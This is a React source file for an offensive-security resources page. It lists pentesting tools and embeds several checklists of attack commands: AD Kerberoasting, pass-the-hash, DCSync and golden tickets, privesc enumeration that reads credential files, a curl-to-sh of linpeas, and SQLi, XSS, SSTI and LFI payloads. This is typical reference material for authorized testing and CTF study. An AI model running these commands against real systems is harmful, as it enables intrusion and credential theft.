import { useState, useEffect, useCallback } from "react";
import { resourceAPI, adminAPI } from "@/lib/api";
import { useAdmin } from "@/context/AdminContext";
import SEO from "@/components/SEO";
import { Dialog, DialogContent, DialogHeader, DialogTitle, DialogTrigger } from "@/components/ui/dialog";
import { toast } from "sonner";
import {
  ExternalLink, Plus, Trash2, FileText, Wrench, BookOpen, ClipboardList,
  ChevronRight, Terminal, Copy, Check, Shield, Globe, Lock, Zap, Search,
} from "lucide-react";

/* ─── style injection ─── */
function useStyles() {
  useEffect(() => {
    if (!document.querySelector("link[data-ctf-fonts]")) {
      const l = document.createElement("link");
      l.rel = "stylesheet";
      l.href = "https://fonts.googleapis.com/css2?family=Share+Tech+Mono&family=Syne:wght@700;800&family=JetBrains+Mono:wght@300;400;500;700&display=swap";
      l.setAttribute("data-ctf-fonts", "1");
      document.head.appendChild(l);
    }
    if (!document.querySelector("style[data-rp]")) {
      const s = document.createElement("style");
      s.setAttribute("data-rp", "1");
      s.textContent = RP_CSS;
      document.head.appendChild(s);
    }
  }, []);
}

/* ─── constants ─── */
const CATEGORIES = ["checklists", "tools", "notes", "templates"];

const CAT_CFG = {
  checklists: { icon: ClipboardList, label: "Checklists",     color: "#00ff88", rgb: "0,255,136"   },
  tools:      { icon: Wrench,        label: "Tools",          color: "#00d4ff", rgb: "0,212,255"   },
  notes:      { icon: BookOpen,      label: "Notes & Guides", color: "#ff8c42", rgb: "255,140,66"  },
  templates:  { icon: FileText,      label: "Templates",      color: "#cc44ff", rgb: "204,68,255"  },
};

/* ─── tag color map ─── */
const TAG_CFG = {
  free:      { bg: "rgba(0,255,136,.08)",   color: "#00ff88", border: "rgba(0,255,136,.25)"  },
  freemium:  { bg: "rgba(255,215,0,.08)",   color: "#ffd700", border: "rgba(255,215,0,.25)"  },
  paid:      { bg: "rgba(204,68,255,.08)",  color: "#cc44ff", border: "rgba(204,68,255,.25)" },
  essential: { bg: "rgba(255,140,66,.08)",  color: "#ff8c42", border: "rgba(255,140,66,.25)" },
  new:       { bg: "rgba(0,212,255,.08)",   color: "#00d4ff", border: "rgba(0,212,255,.25)"  },
};

const DEFAULT_RESOURCES = [
  /* ── CHECKLISTS ── */
  {
    id: "default-ad-checklist", category: "checklists",
    title: "Active Directory Attack Checklist",
    description: "Comprehensive AD enumeration and attack methodology",
    content: `# Active Directory Attack Checklist

## Initial Enumeration
- [ ] Run bloodhound-python or SharpHound
- [ ] Enumerate users: Get-ADUser -Filter * | Select Name,SamAccountName
- [ ] Enumerate groups: Get-ADGroup -Filter * | Select Name
- [ ] Find Domain Admins: Get-ADGroupMember "Domain Admins"
- [ ] Check for AS-REP roastable users
- [ ] Check for Kerberoastable accounts

## Credential Attacks
- [ ] AS-REP Roasting: GetNPUsers.py domain/ -usersfile users.txt -no-pass
- [ ] Kerberoasting: GetUserSPNs.py domain/user:pass -request
- [ ] Password Spraying (careful with lockouts)
- [ ] LLMNR/NBT-NS Poisoning with Responder

## Lateral Movement
- [ ] Pass-the-Hash: crackmapexec smb IP -u user -H hash
- [ ] Pass-the-Ticket: export KRB5CCNAME=ticket.ccache
- [ ] Overpass-the-Hash: getTGT.py domain/user -hashes :NTLM

## Privilege Escalation
- [ ] Check for DCSync rights / WriteDACL / GenericAll
- [ ] Unconstrained / Constrained / RBCD Delegation

## Domain Dominance
- [ ] DCSync: secretsdump.py domain/admin@DC -just-dc
- [ ] Golden Ticket: ticketer.py -nthash KRBTGT_HASH -domain-sid SID -domain domain Admin`,
  },
  {
    id: "default-linux-privesc", category: "checklists",
    title: "Linux Privilege Escalation Checklist",
    description: "Essential Linux privesc enumeration steps",
    content: `# Linux PrivEsc Checklist

## Quick Wins
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontab && ls -la /etc/cron.*
getcap -r / 2>/dev/null

## Enumeration
uname -a && cat /etc/os-release
env && cat /etc/passwd
find / -name "id_rsa" 2>/dev/null
cat ~/.bash_history
netstat -tulnp

## Automated
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
./pspy64`,
  },
  {
    id: "default-web-checklist", category: "checklists",
    title: "Web Exploitation Notes",
    description: "Common web vulnerabilities and testing methodology",
    content: `# Web Exploitation

## Recon
gobuster dir -u http://target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf -w subdomains.txt -u http://FUZZ.target.com

## SQLi
' OR '1'='1'--
' UNION SELECT NULL,NULL--
sqlmap -u "http://target/page?id=1" --dbs

## XSS
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><svg onload=alert(1)>

## SSTI
{{7*7}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

## LFI
../../../etc/passwd
php://filter/convert.base64-encode/resource=index.php`,
  },
  {
    id: "default-windows-privesc", category: "checklists",
    title: "Windows Privilege Escalation Checklist",
    description: "Essential Windows privesc paths and enumeration",
    tag: "essential",
    content: `# Windows PrivEsc Checklist

## Quick Wins
whoami /priv
whoami /groups
net localgroup administrators
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

## Service Exploits
sc query state= all
accesschk.exe -uwcqv "Authenticated Users" *
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

## Registry
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

## Credentials
reg query HKLM /f password /t REG_SZ /s
cmdkey /list
dir /s *pass* == *cred* == *vnc* == *.config

## Automated
.\winPEAS.exe
.\PowerUp.ps1 ; Invoke-AllChecks`,
  },
  {
    id: "default-network-checklist", category: "checklists",
    title: "Network Pentesting Checklist",
    description: "Network-level attack methodology and enumeration",
    tag: "new",
    content: `# Network Pentesting Checklist

## Discovery
nmap -sn 192.168.1.0/24
netdiscover -r 192.168.1.0/24
arp-scan --localnet

## Port Scanning
nmap -sV -sC -p- --min-rate 5000 TARGET
nmap -sU --top-ports 100 TARGET

## Service Enum
# SMB
enum4linux -a TARGET
crackmapexec smb TARGET --shares

# FTP
ftp TARGET (try anonymous:anonymous)

# SSH
ssh -o StrictHostKeyChecking=no user@TARGET

# SNMP
snmpwalk -v2c -c public TARGET

## Man-in-the-Middle
responder -I eth0 -rdwP
mitm6 -d domain.local`,
  },

  /* ── TOOLS ── */
  { id: "default-tool-nmap",         category: "tools", tag: "free",      title: "Nmap",                  description: "Network exploration and security auditing tool — industry standard for port scanning and service enumeration.",        url: "https://nmap.org"                                                  },
  { id: "default-tool-burp",         category: "tools", tag: "freemium",  title: "Burp Suite",            description: "Web application security testing platform. Intercept, modify, and replay HTTP traffic.",                            url: "https://portswigger.net/burp"                                      },
  { id: "default-tool-hashcat",      category: "tools", tag: "free",      title: "Hashcat",               description: "Advanced password recovery utility using GPU acceleration. 300+ hash types and multiple attack modes.",              url: "https://hashcat.net/hashcat"                                       },
  { id: "default-tool-bloodhound",   category: "tools", tag: "free",      title: "BloodHound",            description: "Active Directory attack path visualization using graph theory. Essential for AD pentesting.",                        url: "https://github.com/BloodHoundAD/BloodHound"                       },
  { id: "default-tool-impacket",     category: "tools", tag: "free",      title: "Impacket",              description: "Python classes for working with network protocols. Indispensable for SMB, Kerberos, and Windows attacks.",           url: "https://github.com/SecureAuthCorp/impacket"                       },
  { id: "default-tool-gtfobins",     category: "tools", tag: "free",      title: "GTFOBins",              description: "Unix binaries exploitable for privilege escalation, file read/write, and shell escape.",                            url: "https://gtfobins.github.io"                                       },
  { id: "default-tool-cyberchef",    category: "tools", tag: "free",      title: "CyberChef",             description: "The cyber Swiss Army Knife. Encode, decode, encrypt, decrypt, and analyze data with a visual recipe builder.",       url: "https://gchq.github.io/CyberChef"                                 },
  { id: "default-tool-revshells",    category: "tools", tag: "free",      title: "Reverse Shell Gen",     description: "Quickly generate reverse shell one-liners in bash, python, php, perl, nc, and more.",                              url: "https://revshells.com"                                             },
  { id: "default-tool-crackstation", category: "tools", tag: "free",      title: "CrackStation",          description: "Free password hash cracker. Supports MD5, SHA1, SHA256, and more using massive precomputed tables.",                url: "https://crackstation.net"                                          },
  { id: "default-tool-lolbas",       category: "tools", tag: "free",      title: "LOLBAS",                description: "Living Off The Land Binaries for Windows — the GTFOBins equivalent for Windows privilege escalation.",              url: "https://lolbas-project.github.io"                                  },
  { id: "default-tool-shodan",       category: "tools", tag: "freemium",  title: "Shodan",                description: "Search engine for internet-connected devices. Find exposed servers, cameras, ICS, and more.",                       url: "https://shodan.io"                                                 },
  { id: "default-tool-exploitdb",    category: "tools", tag: "free",      title: "Exploit-DB",            description: "The world's largest public exploit archive. Maintained by Offensive Security. Searchable CVE database.",            url: "https://exploit-db.com"                                            },
  { id: "default-tool-linpeas",      category: "tools", tag: "free",      title: "LinPEAS / WinPEAS",     description: "Privilege Escalation Awesome Scripts Suite — automated enumeration for Linux and Windows privesc paths.",           url: "https://github.com/carlospolop/PEASS-ng"                          },
  { id: "default-tool-metasploit",   category: "tools", tag: "freemium",  title: "Metasploit",            description: "World's most used penetration testing framework with thousands of modules for exploitation and post-exploitation.",  url: "https://metasploit.com"                                            },
  { id: "default-tool-virustotal",   category: "tools", tag: "free",      title: "VirusTotal",            description: "Analyze suspicious files, domains, IPs, and URLs for malware using 70+ antivirus engines.",                         url: "https://virustotal.com"                                            },
  { id: "default-tool-dcode",        category: "tools", tag: "free",      title: "dCode",                 description: "Online toolkit for CTF crypto challenges. Identify and solve ciphers, encodings, and puzzles.",                     url: "https://dcode.fr"                                                  },
  { id: "default-tool-ippsec",       category: "tools", tag: "free",      title: "IPPSec Rocks",          description: "Searchable index of IPPSec's HackTheBox walkthroughs. Find exactly the right technique.",                          url: "https://ippsec.rocks"                                              },
  { id: "default-tool-dnsdumpster",  category: "tools", tag: "free",      title: "DNSDumpster",           description: "Free domain research tool for discovering hosts related to a domain. Maps DNS records visually.",                   url: "https://dnsdumpster.com"                                           },
  { id: "default-tool-webhook",      category: "tools", tag: "free",      title: "Webhook.site",          description: "Instantly get a unique URL to test HTTP requests, SSRF callbacks, and out-of-band exfiltration.",                  url: "https://webhook.site"                                              },

  /* ── NOTES ── */
  { id: "default-note-payloads",     category: "notes", tag: "free",      title: "PayloadsAllTheThings",  description: "Comprehensive list of payloads and bypasses for web application security. Essential GitHub repo.",                  url: "https://github.com/swisskyrepo/PayloadsAllTheThings"              },
  { id: "default-note-hacktricks",   category: "notes", tag: "free",      title: "HackTricks",            description: "Massive pentesting knowledge base covering web, AD, cloud, network, and CTF techniques with real examples.",        url: "https://book.hacktricks.xyz"                                       },
  { id: "default-note-pentestmk",    category: "notes", tag: "free",      title: "PentestMonkey",         description: "Classic pentest cheat sheets — reverse shells, SQL injection, and more. A timeless reference for every pentester.", url: "https://pentestmonkey.net"                                         },
  { id: "default-note-ctftime",      category: "notes", tag: "free",      title: "CTFtime",               description: "CTF event calendar and team rankings. Find upcoming competitions, past writeups, and global standings.",            url: "https://ctftime.org"                                               },
  { id: "default-note-0xdf",         category: "notes", tag: "free",      title: "0xdf hacks stuff",      description: "In-depth HTB and CTF writeups by 0xdf. Exceptional quality explanations with detailed methodology.",               url: "https://0xdf.gitlab.io"                                            },

  /* ── TEMPLATES ── */
  { id: "default-tmpl-oscp",         category: "templates", tag: "free",  title: "OSCP Report Template",  description: "Professional penetration testing report template in Markdown. OSCP exam-ready format.",                            url: "https://github.com/noraj/OSCP-Exam-Report-Template-Markdown"     },
  { id: "default-tmpl-sysreptor",    category: "templates", tag: "free",  title: "SysReptor",             description: "Modern pentest report builder with collaborative editing, customizable templates, and PDF export.",                 url: "https://github.com/Syslifters/sysreptor"                          },
];

/* ─── helpers ─── */
const Blink = () => <span className="rp-blink" />;
const CatIcon = ({ cat, size = 14 }) => {
  const Ic = CAT_CFG[cat]?.icon || Wrench;
  return <Ic size={size} />;
};

const ResourceTag = ({ tag }) => {
  if (!tag || !TAG_CFG[tag]) return null;
  const cfg = TAG_CFG[tag];
  return (
    <span className="rp-tag" style={{ background: cfg.bg, color: cfg.color, borderColor: cfg.border }}>
      {tag}
    </span>
  );
};

/* ════════════════════════════════════════════
   MAIN
════════════════════════════════════════════ */
const ResourcesPage = () => {
  useStyles();
  const { isAuthenticated, getAuthHeader } = useAdmin();

  const [resources,         setResources]         = useState([]);
  const [loading,           setLoading]           = useState(true);
  const [filter,            setFilter]            = useState("");
  const [search,            setSearch]            = useState("");
  const [dialogOpen,        setDialogOpen]        = useState(false);
  const [expandedChecklist, setExpandedChecklist] = useState(null);
  const [copiedId,          setCopiedId]          = useState(null);
  const [newResource,       setNewResource]       = useState({
    title: "", description: "", url: "", content: "", category: "tools",
  });

  const fetchResources = useCallback(async () => {
    try {
      const r = await resourceAPI.getAll(filter || undefined);
      setResources(r.data);
    } catch (e) { console.error(e); }
    finally { setLoading(false); }
  }, [filter]);

  useEffect(() => { fetchResources(); }, [fetchResources]);

  const handleCreate = async (e) => {
    e.preventDefault();
    try {
      await adminAPI.createResource(newResource, getAuthHeader());
      toast.success("Resource added!");
      setNewResource({ title: "", description: "", url: "", content: "", category: "tools" });
      setDialogOpen(false);
      fetchResources();
    } catch { toast.error("Failed to add resource"); }
  };

  const handleDelete = async (id) => {
    if (!window.confirm("Delete this resource?")) return;
    try {
      await adminAPI.deleteResource(id, getAuthHeader());
      toast.success("Deleted");
      fetchResources();
    } catch { toast.error("Failed to delete"); }
  };

  const handleCopy = (text, id) => {
    navigator.clipboard.writeText(text);
    setCopiedId(id);
    toast.success("Copied!");
    setTimeout(() => setCopiedId(null), 2200);
  };

  /* merge + dedupe + search */
  const allResources = [
    ...resources,
    ...DEFAULT_RESOURCES.filter(d => !resources.some(r => r.title === d.title)),
  ];

  const searchFiltered = search.trim()
    ? allResources.filter(r =>
        r.title.toLowerCase().includes(search.toLowerCase()) ||
        r.description.toLowerCase().includes(search.toLowerCase())
      )
    : allResources;

  const filtered = filter ? searchFiltered.filter(r => r.category === filter) : searchFiltered;

  const grouped = CATEGORIES.reduce((acc, cat) => {
    acc[cat] = filtered.filter(r => r.category === cat);
    return acc;
  }, {});

  const totalCount = allResources.length;
  const featuredCount = allResources.filter(r => r.tag === "essential" || r.tag === "new").length;
  const externalCount = allResources.filter(r => r.url).length;
  const quickStart = [
    grouped.tools?.[0],
    grouped.checklists?.[0],
    grouped.notes?.[0],
  ].filter(Boolean);

  return (
    <div className="rp-root" data-testid="resources-page">
      <SEO
        title="Resources"
        description="Curated offensive security tools, checklists, cheat sheets, and reference materials."
      />

      {/* ── hero ── */}
      <div className="rp-hero">
        <div className="rp-hero-grid" aria-hidden="true" />
        <div className="rp-hero-glow" aria-hidden="true" />
        <div className="rp-hero-inner">
          <div className="rp-breadcrumb">
            <span className="rp-prompt">$</span>
            cat /opt/tools/arsenal.md
            <Blink />
          </div>
          <div className="rp-hero-row">
            <div>
              <h1 className="rp-title">Resources</h1>
              <p className="rp-subtitle">Curated tools, checklists, and reference materials for offensive security</p>
            </div>
            {isAuthenticated && (
              <Dialog open={dialogOpen} onOpenChange={setDialogOpen}>
                <DialogTrigger asChild>
                  <button className="rp-btn rp-btn-primary" data-testid="add-resource-btn">
                    <Plus size={13} /> Add Resource
                  </button>
                </DialogTrigger>
                <DialogContent className="rp-dialog">
                  <DialogHeader>
                    <DialogTitle className="rp-dialog-title">
                      <Terminal size={14} color="#00ff88" /> Add Resource
                    </DialogTitle>
                  </DialogHeader>
                  <form onSubmit={handleCreate} className="rp-form">
                    <div className="rp-g2">
                      <div className="rp-field">
                        <div className="rp-fl"><span className="rp-fl-arr">›</span>Title *</div>
                        <input className="rp-in" required value={newResource.title}
                          onChange={e => setNewResource(n => ({ ...n, title: e.target.value }))}
                          data-testid="resource-title-input" />
                      </div>
                      <div className="rp-field">
                        <div className="rp-fl"><span className="rp-fl-arr">›</span>Category</div>
                        <div className="rp-sel-wrap">
                          <select className="rp-sel" value={newResource.category}
                            onChange={e => setNewResource(n => ({ ...n, category: e.target.value }))}
                            data-testid="resource-category-select">
                            {CATEGORIES.map(c => (
                              <option key={c} value={c}>{CAT_CFG[c].label}</option>
                            ))}
                          </select>
                        </div>
                      </div>
                    </div>
                    <div className="rp-field">
                      <div className="rp-fl"><span className="rp-fl-arr">›</span>Description *</div>
                      <input className="rp-in" required value={newResource.description}
                        onChange={e => setNewResource(n => ({ ...n, description: e.target.value }))}
                        data-testid="resource-description-input" />
                    </div>
                    <div className="rp-field">
                      <div className="rp-fl"><span className="rp-fl-arr">›</span>URL (optional)</div>
                      <input className="rp-in" placeholder="https://…" value={newResource.url}
                        onChange={e => setNewResource(n => ({ ...n, url: e.target.value }))}
                        data-testid="resource-url-input" />
                    </div>
                    <div className="rp-field">
                      <div className="rp-fl"><span className="rp-fl-arr">›</span>Content (Markdown)</div>
                      <textarea className="rp-in rp-ta" rows={6} placeholder="Markdown content…"
                        value={newResource.content}
                        onChange={e => setNewResource(n => ({ ...n, content: e.target.value }))}
                        data-testid="resource-content-input" />
                    </div>
                    <button type="submit" className="rp-btn rp-btn-primary rp-full"
                      data-testid="resource-submit-btn">
                      <Plus size={13} /> Add Resource
                    </button>
                  </form>
                </DialogContent>
              </Dialog>
            )}
          </div>

          {/* stats bar */}
          <div className="rp-stats">
            <div className="rp-stat">
              <span className="rp-stat-n" style={{ color: "#00ff88" }}>{totalCount}</span>
              <span className="rp-stat-l">Total</span>
            </div>
            {CATEGORIES.map(cat => {
              const cfg = CAT_CFG[cat];
              const count = allResources.filter(r => r.category === cat).length;
              return (
                <div key={cat} className="rp-stat">
                  <span className="rp-stat-n" style={{ color: cfg.color }}>{count}</span>
                  <span className="rp-stat-l">{cfg.label}</span>
                </div>
              );
            })}
          </div>
        </div>
      </div>

      <div className="rp-body">

        {/* search + tabs row */}
        <div className="rp-controls">
          <div className="rp-search-wrap">
            <Search size={13} className="rp-search-icon" />
            <input
              className="rp-search"
              placeholder="Search resources…"
              value={search}
              onChange={e => setSearch(e.target.value)}
            />
            {search && (
              <button className="rp-search-clear" onClick={() => setSearch("")}>×</button>
            )}
          </div>

          <div className="rp-tabs">
            <button className={`rp-tab${filter === "" ? " is-active" : ""}`}
              onClick={() => setFilter("")} data-testid="filter-all">All</button>
            {CATEGORIES.map(cat => {
              const cfg = CAT_CFG[cat];
              const active = filter === cat;
              return (
                <button key={cat}
                  className={`rp-tab${active ? " is-active" : ""}`}
                  style={active ? { borderColor: cfg.color, color: cfg.color, background: `rgba(${cfg.rgb},.07)` } : {}}
                  onClick={() => setFilter(cat)}
                  data-testid={`filter-${cat}`}>
                  <CatIcon cat={cat} size={12} />
                  {cfg.label}
                </button>
              );
            })}
          </div>
        </div>

        {!loading && filtered.length > 0 && (
          <div className="rp-overview-grid">
            <section className="rp-overview-card" aria-label="Resource library overview">
              <div className="rp-overview-head">
                <span className="rp-overview-kicker">Curated Library</span>
                <span className="rp-overview-pill">{filter ? CAT_CFG[filter]?.label || filter : "All categories"}</span>
              </div>
              <h2 className="rp-overview-title">
                {search
                  ? `Focused results for "${search}"`
                  : "A practical offensive security library, organized for real operator workflows"}
              </h2>
              <p className="rp-overview-copy">
                {search
                  ? "These results are filtered from the full library so you can move faster from research to execution."
                  : "Use this page as a working arsenal: reference material, battle-tested tools, and reusable checklists for web, AD, privesc, and reporting."}
              </p>
              <div className="rp-overview-stats">
                <div className="rp-overview-stat">
                  <span className="rp-overview-stat-num">{filtered.length}</span>
                  <span className="rp-overview-stat-label">visible resources</span>
                </div>
                <div className="rp-overview-stat">
                  <span className="rp-overview-stat-num">{featuredCount}</span>
                  <span className="rp-overview-stat-label">priority picks</span>
                </div>
                <div className="rp-overview-stat">
                  <span className="rp-overview-stat-num">{externalCount}</span>
                  <span className="rp-overview-stat-label">external references</span>
                </div>
              </div>
            </section>

            <aside className="rp-overview-card" aria-label="Quick start resources">
              <div className="rp-overview-head">
                <span className="rp-overview-kicker">Quick Start</span>
                <span className="rp-overview-pill">Editor picks</span>
              </div>
              <div className="rp-quick-list">
                {quickStart.map((item) => (
                  <div key={item.id} className="rp-quick-item">
                    <div className="rp-quick-top">
                      <span style={{ color: CAT_CFG[item.category].color, display: "flex" }}>
                        <CatIcon cat={item.category} size={13} />
                      </span>
                      {item.tag && <ResourceTag tag={item.tag} />}
                    </div>
                    <div className="rp-quick-title">{item.title}</div>
                    <div className="rp-quick-desc">{item.description}</div>
                  </div>
                ))}
              </div>
            </aside>
          </div>
        )}

        {search && (
          <div className="rp-search-info">
            <Terminal size={11} />
            {filtered.length} result{filtered.length !== 1 ? "s" : ""} for&nbsp;
            <span style={{ color: "#00ff88" }}>"{search}"</span>
          </div>
        )}

        {loading ? (
          <div className="rp-grid-3">
            {[...Array(6)].map((_, i) => (
              <div key={i} className="rp-skeleton">
                <div className="rp-sk rp-sk-s" />
                <div className="rp-sk rp-sk-m" />
                <div className="rp-sk rp-sk-l" />
              </div>
            ))}
          </div>
        ) : (
          <div className="rp-sections">
            {CATEGORIES.map(cat => {
              const list = grouped[cat];
              if ((filter && filter !== cat) || !list?.length) return null;
              const cfg = CAT_CFG[cat];

              return (
                <section key={cat} className="rp-section">
                  <div className="rp-sec-hdr">
                    <span style={{ color: cfg.color, display: "flex" }}><CatIcon cat={cat} size={14} /></span>
                    <span className="rp-sec-title">{cfg.label}</span>
                    <span className="rp-sec-count" style={{ color: cfg.color }}>{list.length}</span>
                    <span className="rp-sec-rule" />
                  </div>

                  {cat === "checklists" ? (
                    <div className="rp-accordion">
                      {list.map(r => (
                        <div key={r.id} className="rp-acc-item">
                          <button className="rp-acc-trigger"
                            onClick={() => setExpandedChecklist(expandedChecklist === r.id ? null : r.id)}
                            data-testid={`checklist-${r.id}`}>
                            <div className="rp-acc-trigger-left">
                              <div style={{ display: "flex", alignItems: "center", gap: "8px", marginBottom: "3px" }}>
                                <div className="rp-acc-title">{r.title}</div>
                                {r.tag && <ResourceTag tag={r.tag} />}
                              </div>
                              <div className="rp-acc-desc">{r.description}</div>
                            </div>
                            <span className="rp-acc-arrow"
                              style={{ transform: expandedChecklist === r.id ? "rotate(90deg)" : "none" }}>
                              <ChevronRight size={14} />
                            </span>
                          </button>
                          {expandedChecklist === r.id && r.content && (
                            <div className="rp-acc-body">
                              <div className="rp-acc-toolbar">
                                <span className="rp-acc-tbl-label"><Terminal size={11} />&nbsp;content</span>
                                <button className="rp-copy-btn" onClick={() => handleCopy(r.content, r.id)}>
                                  {copiedId === r.id
                                    ? <><Check size={11} /><span>Copied!</span></>
                                    : <><Copy size={11} /><span>Copy all</span></>}
                                </button>
                              </div>
                              <pre className="rp-acc-pre">{r.content}</pre>
                            </div>
                          )}
                        </div>
                      ))}
                    </div>
                  ) : (
                    <div className="rp-grid-3">
                      {list.map(r => (
                        <div key={r.id} className="rp-card" style={{ "--cat-color": cfg.color, "--cat-rgb": cfg.rgb }}>
                          <div className="rp-card-top">
                            <div style={{ display: "flex", alignItems: "center", gap: "8px" }}>
                              <span className="rp-card-icon" style={{ color: cfg.color }}>
                                <CatIcon cat={cat} size={15} />
                              </span>
                              {r.tag && <ResourceTag tag={r.tag} />}
                            </div>
                            {isAuthenticated && !r.id.startsWith("default") && (
                              <button className="rp-delete" onClick={() => handleDelete(r.id)}
                                data-testid={`delete-resource-${r.id}`}>
                                <Trash2 size={13} />
                              </button>
                            )}
                          </div>
                          <div className="rp-card-title">{r.title}</div>
                          <div className="rp-card-desc">{r.description}</div>
                          {r.url && (
                            <a href={r.url} target="_blank" rel="noopener noreferrer"
                              className="rp-card-link" style={{ color: cfg.color }}
                              data-testid={`resource-link-${r.id}`}>
                              Visit <ExternalLink size={10} />
                            </a>
                          )}
                          <div className="rp-card-bar"
                            style={{ background: `linear-gradient(90deg,${cfg.color},transparent)` }} />
                        </div>
                      ))}
                    </div>
                  )}
                </section>
              );
            })}

            {filtered.length === 0 && (
              <div className="rp-empty">
                <span className="rp-empty-icon">⊘</span>
                <p>No resources found{search ? ` for "${search}"` : ""}.</p>
              </div>
            )}
          </div>
        )}
      </div>
    </div>
  );
};

/* ════════════════════════════════════════════
   CSS
════════════════════════════════════════════ */
const RP_CSS = `
@keyframes rp-fadein  { from{opacity:0;transform:translateY(10px)} to{opacity:1;transform:translateY(0)} }
@keyframes rp-blink   { 0%,100%{opacity:1} 50%{opacity:0} }
@keyframes rp-shimmer { 0%{background-position:200% 0} 100%{background-position:-200% 0} }
@keyframes rp-pulse   { 0%,100%{opacity:.5} 50%{opacity:1} }

.rp-root {
  min-height:100vh; background:#070a0e;
  background-image:
    linear-gradient(rgba(0,255,136,.012) 1px,transparent 1px),
    linear-gradient(90deg,rgba(0,255,136,.012) 1px,transparent 1px);
  background-size:44px 44px;
  font-family:'JetBrains Mono',ui-monospace,monospace; color:#b8c4d0;
}
.rp-blink {
  display:inline-block; width:8px; height:14px; background:#00ff88;
  vertical-align:middle; margin-left:3px;
  animation:rp-blink 1.1s step-end infinite;
}

/* ── hero ── */
.rp-hero {
  position:relative; overflow:hidden; padding:4.5rem 0 2.8rem;
  border-bottom:1px solid #1a2738;
}
.rp-hero-grid {
  position:absolute; inset:0; pointer-events:none;
  background-image:
    linear-gradient(rgba(0,255,136,.025) 1px,transparent 1px),
    linear-gradient(90deg,rgba(0,255,136,.025) 1px,transparent 1px);
  background-size:44px 44px;
  -webkit-mask-image:linear-gradient(180deg,transparent,rgba(0,0,0,.9) 25%,rgba(0,0,0,.9) 75%,transparent);
  mask-image:linear-gradient(180deg,transparent,rgba(0,0,0,.9) 25%,rgba(0,0,0,.9) 75%,transparent);
}
.rp-hero-glow {
  position:absolute; inset:0; pointer-events:none;
  background:
    radial-gradient(ellipse 700px 350px at 50% -5%,rgba(0,255,136,.07) 0%,transparent 70%),
    radial-gradient(ellipse 400px 300px at 90% 60%,rgba(0,212,255,.04) 0%,transparent 60%);
}
.rp-hero-inner {
  position:relative; z-index:1;
  max-width:1200px; margin:0 auto; padding:0 2.5rem;
  animation:rp-fadein .5s ease both;
}
.rp-breadcrumb {
  display:inline-flex; align-items:center; gap:8px;
  font-family:'Share Tech Mono',monospace; font-size:12px; color:#56657a;
  background:#0c1118; border:1px solid #1a2738; padding:5px 14px; border-radius:2px;
  margin-bottom:1.3rem;
}
.rp-prompt { color:#00ff88 }
.rp-hero-row { display:flex; align-items:flex-start; justify-content:space-between; gap:1rem; flex-wrap:wrap; margin-bottom:2rem }
.rp-title {
  font-family:'Syne',system-ui,sans-serif;
  font-size:clamp(2rem,5vw,3rem); font-weight:800;
  color:#e2eaf3; letter-spacing:-.025em; margin:0 0 .4rem;
}
.rp-subtitle { font-size:13px; color:#56657a; margin:0 }

/* stats */
.rp-stats { display:flex; border:1px solid #1a2738; border-radius:3px; overflow:hidden; width:fit-content; background:#0c1118 }
.rp-stat  { display:flex; flex-direction:column; align-items:center; padding:.65rem 1.3rem; border-right:1px solid #1a2738; gap:3px }
.rp-stat:last-child { border-right:none }
.rp-stat-n { font-family:'Share Tech Mono',monospace; font-size:18px; line-height:1 }
.rp-stat-l { font-family:'Share Tech Mono',monospace; font-size:9px; text-transform:uppercase; letter-spacing:.1em; color:#56657a }

/* buttons */
.rp-btn {
  display:inline-flex; align-items:center; gap:6px; padding:8px 16px;
  font-family:'JetBrains Mono',monospace; font-size:12px; letter-spacing:.04em;
  border-radius:3px; cursor:pointer; border:1px solid transparent;
  transition:all .18s; white-space:nowrap; -webkit-appearance:none; appearance:none;
}
.rp-btn-primary { background:rgba(0,255,136,.1); color:#00ff88; border-color:rgba(0,255,136,.4); box-shadow:0 0 12px rgba(0,255,136,.07) }
.rp-btn-primary:hover { background:rgba(0,255,136,.18); box-shadow:0 0 22px rgba(0,255,136,.15) }
.rp-full { width:100%; justify-content:center }

/* body */
.rp-body { max-width:1200px; margin:0 auto; padding:2rem 2.5rem 6rem }

/* controls row */
.rp-controls { display:flex; flex-direction:column; gap:14px; margin-bottom:2rem }

/* overview */
.rp-overview-grid { display:grid; grid-template-columns:1.15fr .85fr; gap:1rem; margin:0 0 2rem }
.rp-overview-card {
  background:linear-gradient(180deg,rgba(12,17,24,.98) 0%,rgba(8,12,18,.98) 100%);
  border:1px solid #1a2738; border-radius:3px; padding:1.15rem 1.2rem;
  box-shadow:0 18px 45px rgba(0,0,0,.16);
}
.rp-overview-head { display:flex; align-items:center; justify-content:space-between; gap:10px; margin-bottom:.8rem }
.rp-overview-kicker {
  font-family:'Share Tech Mono',monospace; font-size:10px;
  letter-spacing:.16em; text-transform:uppercase; color:#56657a;
}
.rp-overview-pill {
  display:inline-flex; align-items:center; padding:3px 9px;
  border:1px solid rgba(0,255,136,.22); border-radius:999px;
  background:rgba(0,255,136,.06); color:#00ff88;
  font-family:'Share Tech Mono',monospace; font-size:9px; letter-spacing:.14em; text-transform:uppercase;
}
.rp-overview-title {
  margin:0 0 .55rem; font-family:'Syne',system-ui,sans-serif;
  font-size:clamp(1.35rem,2.6vw,1.9rem); font-weight:800;
  letter-spacing:-.02em; line-height:1.08; color:#e2eaf3;
}
.rp-overview-copy { margin:0 0 .95rem; font-size:12px; line-height:1.85; color:#8faabf }
.rp-overview-stats { display:grid; grid-template-columns:repeat(3,minmax(0,1fr)); gap:8px }
.rp-overview-stat { padding:.85rem .9rem; background:#070c12; border:1px solid #1a2738; border-radius:3px }
.rp-overview-stat-num {
  display:block; font-family:'Syne',system-ui,sans-serif;
  font-size:1.35rem; font-weight:800; line-height:1; color:#e2eaf3;
}
.rp-overview-stat-label {
  display:block; margin-top:4px; font-family:'Share Tech Mono',monospace;
  font-size:9px; letter-spacing:.14em; text-transform:uppercase; color:#56657a;
}
.rp-quick-list { display:flex; flex-direction:column; gap:10px }
.rp-quick-item { padding:.9rem; background:#070c12; border:1px solid #1a2738; border-radius:3px }
